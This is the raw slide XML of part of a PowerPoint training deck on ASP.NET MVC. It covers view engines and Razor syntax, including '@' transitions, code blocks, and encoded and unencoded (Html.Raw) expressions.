            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: Razor View Engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2062739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Engines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP.NET MVC comes with Razor view engine by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASPX view engine not supported by ASP.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Core MVC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other view engines:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NDjango</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NHaml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NVelocity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SharpTiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>StringTemplate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSLT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1798740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Razor View Engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clean, lightweight, and simple view engine for ASP.NET MVC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default view engine for ASP.NET MVC 3.0 onwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimizes the amount of syntax and extra characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reduces syntax between code and view markup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full IntelliSense support in Visual Studio</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13114047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Razor View</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2666819" y="990600"/>
            <a:ext cx="6470610" cy="50863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830433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Expressions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ sign used for transition from markup to code and back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@@ used as an escape sequence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154834" y="2895600"/>
            <a:ext cx="7668971" cy="180016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117071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Blocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Razor supports code blocks within a view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code blocks may automatically be transformed into markup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3622668" y="2781300"/>
            <a:ext cx="4763784" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Bent-Up Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2558311" y="2552703"/>
            <a:ext cx="598378" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="129038">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10727287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Razor Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="886002087"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="990600"/>
          <a:ext cx="5638800" cy="3916680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="5638800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr marL="0" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr marL="457178" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr marL="914354" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr marL="1371532" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr marL="1828709" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr marL="2285886" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr marL="2743062" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr marL="3200240" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr marL="3657418" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:defRPr sz="1900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI"/>
                        </a:defRPr>
                      </a:lvl9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Razor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Syntax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="120831">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:lnTlToBr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnTlToBr>
                    <a:lnBlToTr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="0C6126"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Implicit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0"/>
                        <a:t> code expression</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;span&gt;@model.Message&lt;/span&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="120831">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:lnTlToBr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnTlToBr>
                    <a:lnBlToTr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="0C6126">
                        <a:tint val="20000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Explicit code expression</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;span&gt;ISBN@(isbn)&lt;/span&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="120831">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>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370840">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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Unencoded code expression</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>span&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>@Html.Raw(model.AlertMessage)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;/span&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="120831">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:lnTlToBr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnTlToBr>
                    <a:lnBlToTr w="12700" cmpd="sng">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="0C6126">
                        <a:tint val="20000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Code block</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>@{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>int x = 567;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>string s = “Microsoft”;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="120831" marR="120831">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C6126"/>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773460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Razor Syntax (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
